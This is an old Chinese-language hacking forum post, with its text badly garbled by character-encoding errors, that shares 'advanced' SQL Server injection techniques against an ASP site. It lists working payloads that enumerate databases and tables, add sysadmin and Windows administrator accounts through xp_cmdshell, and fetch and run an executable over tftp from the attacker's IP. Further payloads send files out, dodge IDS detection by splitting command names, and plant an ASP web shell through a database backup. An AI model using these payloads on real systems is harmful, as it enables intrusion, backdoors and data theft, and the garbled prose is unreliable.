¹C«È:  µù¥U | µn¿ý | ·j¯Á | À°§U | VIPÃÙ§U¥»¯¸ | ¥ZµnÃÙ§U¼s§i | ³]¬°­º­¶ | ¥[¤J¦¬Âà | ÁcÅ餤¤å

 

your gf Ú»­ø¨ì¤ù ¥î¼äóa ¤£¯à³X°ÝSOPCAST­¶­± ¶Â¦â­I´º ¤ÑÀs¤K³¡·tª÷Ä_ ¸Ý¥Ponline©xºô ¤p¤t¬ü ½u¤WH°Êµe §K¶O§Y®É³ø»ù ªá¼Ë¤Ö¦~¤Ö¤k¢ê¢ü ¤Ó»×¥ß§Ó¶Ç ¤H¶¡¤¿¾¹º©µe Hebe·s¾v«¬ Media calssic I miss you³¯¬f¦t seed H LostPlanet¯}¸Ñ ¤Ñ°ó¨pªA³Ü¤ôµ{¦¡ ¤Ñ¥~2 online ¯]®ü®á®³¤p©j¥þ®M

 




·j¯Á¿ï¶µ ¯Á¤Þ¨t²Î¤u¨ãµ¡
 
¼ÐÃD: ®ÛªL¦Ñ§LªºSqlserver°ª级ª`¤J§Þ¥©
http://manyway.net ÃÙ§Uºô¯¸¸ü¤J¤¤...
chan0006
ºaÅA²z¨Æ
Rank: 7Rank: 7Rank: 7Rank: 7Rank: 7Rank: 7Rank: 7
¹q¸£¦a±a°Ï¥D

ºaÅA¾±³¹ ¥Ø«e¨S¦³¾±³¹

UID¡G 460360

©Ê§O¡G ¨k

ºëµØ¡G 3 ½g

¿n¤À¡G 2593 ÂI

©«¤l¡G 1863 ½g

  ¤j ¤¤ ¤p
µoªí©ó 2007-10-7 16:54  ¸ê®Æ  ­Ó¤HªÅ¶¡  ¥D­¶ µu®ø®§  ¥[¬°¦n¤Í  ²K¥[ chan0006 ¬°MSN¦n¤Í ³q¹LMSN©M chan0006 ¥æ½Í QQ

®ÛªL¦Ñ§LªºSqlserver°ª级ª`¤J§Þ¥© ±z¬O²Ä 181­ÓÂsÄýªÌ

现¦b将¦Ñ§L¥»¤H¦h¦~ªºSQLSERVERª`¤J°ª级§Þ¥©©^献给¤ä«ù¦Ñ§LªºªB¤Í¡G


«e¨¥¡G
§Y¬O°ª级§Þ¥©¡A¨ä¥¦°ò¥»ªºª`¤J¤èªk´N¤£详­z¤F¡C
¬Ý¤£À´¥i¬d¥»¯¸ªºª`¤J°ò础¤å³¹¡C
为¤F§ó¦nªº¥Î¦nª`¤J¡A«Ø议¤j®a¬Ý¬Ý¥»¯¸ªºSQL语ªk¬Û关¤å³¹


[获¨ú¥þ³¡数Õu库¦W]
select name from master.dbo.sysdatabases where dbid=7 //dbidªº­È为7¥H¤W³£¬O¥Î户数Õu库


[获±o数Õuªí¦W][将¦r¬q­È§ó·s为ªí¦W¡A¦A·Qªk读¥X这个¦r¬qªº­È´N¥i±o¨ìªí¦W]
select top 1 name from 数Õu库¦W.dbo.sysobjects where xtype='u' and status>0 and name not in('table')


[获±o数Õuªí¦r¬q¦W][将¦r¬q­È§ó·s为¦r¬q¦W¡A¦A·Qªk读¥X这个¦r¬qªº­È´N¥i±o¨ì¦r¬q¦W]
select top 1 数Õu库¦W.dbo.col_name(object_id('­n¬d询ªº数Õuªí¦W'),¦r¬q¦C¦p:1) [ where 条¥ó]


³q过SQLSERVERª`¤Jº|¬}«Ø数Õu库ºÞ²z员帐号©M¨t统ºÞ²z员帐号[当«e帐号¥²须¬OSYSADMIN组]


news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //²K¥[数Õu库¥Î户¥Î户test,±K码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //¦pªG·Q§ï±K码¡A则¥Î这¥y¡]将testªº±K码§ï为123456¡^
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test¥[¨ìsysadmin组,这个组ªº¦¨员¥i执¦æ¥ô¦ó¾Þ§@
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //²K¥[¨t统¥Î户test,±K码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //将¨t统¥Î户test´£¤É为ºÞ²z员


这样¡A§A¦b¥Lªº数Õu库©M¨t统内³£¯d¤U¤FtestºÞ²z员账号¤F


¤U­±¬O¦p¦ó从§AªºªA¾¹¤U载¤å¥ófile.exe¦Z运¦æ¥¦[«e´£¬O§A¥²须将§Aªº电脑设为TFTPªA务¾¹¡A将69ºÝ¤f¥´开]


id=2; exec master.dbo.xp_cmdshell 'tftp ¡Vi §AªºIP get file.exe';--


µM¦Z运¦æ这个¤å¥ó¡G
id=2; exec master.dbo.xp_cmdshell 'file.exe';--


¤U载ªA务¾¹ªº¤å¥ófile2.doc¨ì¥»¦aTFTPªA务¾¹[¤å¥ó¥²须¦s¦b]:


id=2; exec master.dbo.xp_cmdshell 'tftp ¡Vi §AªºIP Put file2.doc';--


绕过IDSªº检测[¨Ï¥Î变¶q]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'


·s¥[ªº:

«Ø¤@个ªí¡C¥u¦³¤@个¦r¬q¡A类«¬为image,将asp内®e写¤J¡C导¥X数Õu库为¤å¥ó
backup database dbname to disk='d:\web\db.asp';


报错±o¨ì¨t统¾Þ§@¨t统©M数Õu库¨t统ª©¥»号
id=2 and 1<>(select @@VERSION);





〓¤¤°ê¶Â«ÈÁp·ù¡]CHU¡^〓«e®Ö¤ß¦¨­û¡A²{¬°ºaÅA·|­û
〓¤¤°ê¶Â«ÈÁp·ù¡]CHU¡^〓ºôµ¸¹q¤lÂø»x¡m¯x°}¡n½s¿è
­·°ó§Þ³N¤u§@«Ç
³»³¡

 



¥»¯¸³]³Æ¾¹§÷¥Ñ Many Way (HK) Limited ÃÙ§U´£¨Ñ
·í«e®É°Ï GMT+8, ²{¦b®É¶¡¬O 2008-10-11 22:47

Advertisting Agency

Audit and Analytics

Partner Companies

Powered by Discuz! 5.5.0¢x0.050852 (s), 7 queries, Copyright © 2008 HK-PUB.COM All Rights Reserved. ¥»¯¸Án©ú - ¼s§i¬d¸ß - ²M°£ Cookies - Ápô§Ú­Ì - ¤j²³½×¾Â - Archiver - WAP